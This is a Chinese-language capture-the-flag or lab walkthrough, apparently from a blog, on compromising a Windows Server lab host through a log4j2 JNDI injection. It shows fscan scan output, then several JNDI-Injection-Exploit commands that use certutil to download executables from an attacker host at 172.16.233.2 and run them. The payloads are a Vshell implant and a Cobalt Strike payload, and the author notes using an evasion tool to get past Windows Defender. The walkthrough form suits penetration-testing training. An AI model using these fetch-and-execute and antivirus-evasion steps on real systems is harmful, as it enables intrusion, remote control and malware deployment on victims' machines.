PT-5
E:\Tool\天狐渗透工具箱-社区版V1.2\Tool\fscan\fscanplus>fscanPlus_amd64.exe -h www.rel8989.cslab
______ _____ _
| ____| | __ \| |
| |__ ___ ___ __ _ _ __ | |__) | |_ _ ___
| __/ __|/ __/ _ | _ \| ___/| | | | / __|
| | \__ \ (_| (_| | | | | | | | |_| \__ \
|_| |___/\___\__,_|_| |_|_| |_|\__,_|___/
fscan version: 1.8.4 TeamdArk5 v1.0
start infoscan
www.rel8989.cslab:139 open
www.rel8989.cslab:445 open
www.rel8989.cslab:135 open
www.rel8989.cslab:8080 open
[*] alive ports len is: 4
start vulscan
[*] NetInfo
[*]www.rel8989.cslab
[->]WIN-2PNAS7U283S
[->]10.0.0.28
[*] WebTitle http://www.rel8989.cslab:8080 code:200 len:22 title:None
[*] NetBios www.rel8989.cslab WIN-2PNAS7U283S Windows Server 2016 Standard 14393
已完成 4/4
[*] 扫描结束,耗时: 13.1153035s
发现是Windows的机器
根据提示是log4j2漏洞,fuzz不出参数,看了官方讲解知道参数为
http://www.rel8989.cslab:8080/cslab?payload=
直接起一个JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
传入Vshell的马
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "certutil -urlcache -split -f http://172.16.233.2/1.exe 1.exe" -A 172.16.233.2
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "cmd /c 1.exe" -A 172.16.233.2
进行url编码
没上线估计是被杀了,我记得之前Defender不杀Vshell…
起CS用掩日做一下免杀
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "certutil -urlcache -split -f http://172.16.233.2/GkN.exe GkN.exe" -A 172.16.233.2
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "certutil -urlcache -split -f http://172.16.233.2/GkN.txt GkN.txt" -A 172.16.233.2
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "cmd /c GkN.exe GkN.txt" -A 172.16.233.2
编码一下,执行,成功上线,查看杀软是Defender
发现之前的马真的被杀了
再传一个试试
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "certutil -urlcache -split -f http://172.16.233.2/1.exe ss.exe" -A 172.16.233.2
传上去了,过了几秒就杀了…
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
